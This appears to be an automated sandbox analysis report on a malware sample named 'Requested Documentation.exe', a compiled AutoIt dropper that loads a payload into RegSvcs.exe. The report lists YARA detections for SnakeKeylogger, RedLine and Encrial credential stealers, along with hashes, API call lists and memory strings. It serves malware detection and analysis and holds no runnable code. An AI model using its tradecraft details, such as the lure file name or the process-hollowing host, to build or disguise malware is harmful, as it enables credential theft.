                  Source: 1.2.RegSvcs.exe.5680000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 1.2.RegSvcs.exe.5680000.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.2.RegSvcs.exe.2db0bf6.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.2.RegSvcs.exe.408e590.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 1.2.RegSvcs.exe.408e590.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.2.RegSvcs.exe.2db0bf6.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 1.2.RegSvcs.exe.2db0bf6.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.2.RegSvcs.exe.4065570.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 1.2.RegSvcs.exe.4065570.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 1.2.RegSvcs.exe.4065570.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 1.2.RegSvcs.exe.4065570.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.2.RegSvcs.exe.5680000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 1.2.RegSvcs.exe.5680000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.2.RegSvcs.exe.56c0000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 1.2.RegSvcs.exe.56c0000.8.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000001.00000002.4192706984.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000000.00000002.1739970349.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: Process Memory Space: RegSvcs.exe PID: 6344, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Binary is likely a compiled AutoIt script file
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: This is a third-party compiled AutoIt script.0_2_00983B3A
                  Source: Requested Documentation.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: Requested Documentation.exe, 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7509ab2d-7
                  Source: Requested Documentation.exe, 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_c29c411c-2
                  Source: Requested Documentation.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c36f905d-c
                  Source: Requested Documentation.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_f187c987-b
                  Initial sample is a PE file and has a suspicious name
                  Source: initial sampleStatic PE information: Filename: Requested Documentation.exe
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009EA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_009EA1EF
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009D8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_009D8310
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009E51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_009E51BD
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_0098E6A00_2_0098E6A0
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009AD9750_2_009AD975
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009A21C50_2_009A21C5
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009B62D20_2_009B62D2
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_00A003DA0_2_00A003DA
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009B242E0_2_009B242E
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009A25FA0_2_009A25FA
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009966E10_2_009966E1
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009DE6160_2_009DE616
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009B878F0_2_009B878F
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009E88890_2_009E8889
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009988080_2_00998808
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009B68440_2_009B6844
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_00A008570_2_00A00857
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009ACB210_2_009ACB21
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009B6DB60_2_009B6DB6
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_00996F9E0_2_00996F9E
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009930300_2_00993030
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009A31870_2_009A3187
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009AF1D90_2_009AF1D9
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009812870_2_00981287
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009A14840_2_009A1484
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009955200_2_00995520
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009A76960_2_009A7696
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009957600_2_00995760
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009A19780_2_009A1978
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009B9AB50_2_009B9AB5
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_0098FCE00_2_0098FCE0
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009A1D900_2_009A1D90
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009ABDA60_2_009ABDA6
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_00A07DDB0_2_00A07DDB
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_00993FE00_2_00993FE0
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_0098DF000_2_0098DF00
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_013035F00_2_013035F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00408C601_2_00408C60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0040DC111_2_0040DC11
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00407C3F1_2_00407C3F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00418CCC1_2_00418CCC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00406CA01_2_00406CA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004028B01_2_004028B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041A4BE1_2_0041A4BE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00408C601_2_00408C60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004182441_2_00418244
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004016501_2_00401650
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00402F201_2_00402F20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004193C41_2_004193C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004187881_2_00418788
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00402F891_2_00402F89
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00402B901_2_00402B90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004073A01_2_004073A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_02EA14481_2_02EA1448
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_02EA14371_2_02EA1437
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_02EA11A81_2_02EA11A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_02EA11991_2_02EA1199
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_057284981_2_05728498
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05722F681_2_05722F68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0572EF301_2_0572EF30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05724FCB1_2_05724FCB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_057249B01_2_057249B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_057221E81_2_057221E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05722F591_2_05722F59
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0572EF211_2_0572EF21
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EE69F81_2_05EE69F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EEB1281_2_05EEB128
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EEE0881_2_05EEE088
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EEB7801_2_05EEB780
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EE63281_2_05EE6328
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EE1DF81_2_05EE1DF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EE59801_2_05EE5980
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EE59701_2_05EE5970
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EE61081_2_05EE6108
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EEB1181_2_05EEB118
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EEACC11_2_05EEACC1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EEACD01_2_05EEACD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EEF8A01_2_05EEF8A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EEF8901_2_05EEF890
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EEA8681_2_05EEA868
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EEA8781_2_05EEA878
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EEF4481_2_05EEF448
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EEA4201_2_05EEA420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EEDC201_2_05EEDC20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EEF4381_2_05EEF438
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EEDC301_2_05EEDC30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EEA4111_2_05EEA411
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EED7CA1_2_05EED7CA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EE9FC81_2_05EE9FC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EED7D81_2_05EED7D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EE9FB81_2_05EE9FB8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EED3801_2_05EED380
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EE9B601_2_05EE9B60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EEB7721_2_05EEB772
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EE9B701_2_05EE9B70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EED3701_2_05EED370
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EECF281_2_05EECF28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EECF181_2_05EECF18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EEEF101_2_05EEEF10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EECAC21_2_05EECAC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EECAD01_2_05EECAD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EEC6681_2_05EEC668
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EEC6781_2_05EEC678
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EE1E081_2_05EE1E08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06AA3C741_2_06AA3C74
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06AA55201_2_06AA5520
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06AA72711_2_06AA7271
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06AAC1091_2_06AAC109
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06AA39581_2_06AA3958
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0040E1D8 appears 43 times
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: String function: 00987DE1 appears 35 times
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: String function: 009A8900 appears 42 times
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: String function: 009A0AE3 appears 70 times
                  Source: Requested Documentation.exe, 00000000.00000003.1735346207.0000000003DD3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Requested Documentation.exe
                  Source: Requested Documentation.exe, 00000000.00000003.1736923449.0000000003FBD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Requested Documentation.exe
                  Source: Requested Documentation.exe, 00000000.00000002.1739970349.0000000003C70000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs Requested Documentation.exe
                  Source: Requested Documentation.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 1.2.RegSvcs.exe.5680ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.5680ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.RegSvcs.exe.2db1ade.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.2db1ade.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.RegSvcs.exe.408e590.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.408e590.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.RegSvcs.exe.4066458.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.4066458.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.Requested Documentation.exe.3c70000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 1.2.RegSvcs.exe.2db1ade.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.2db1ade.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.RegSvcs.exe.56c0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.56c0000.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.RegSvcs.exe.2db0bf6.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.5680ee8.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.5680ee8.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.RegSvcs.exe.4066458.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
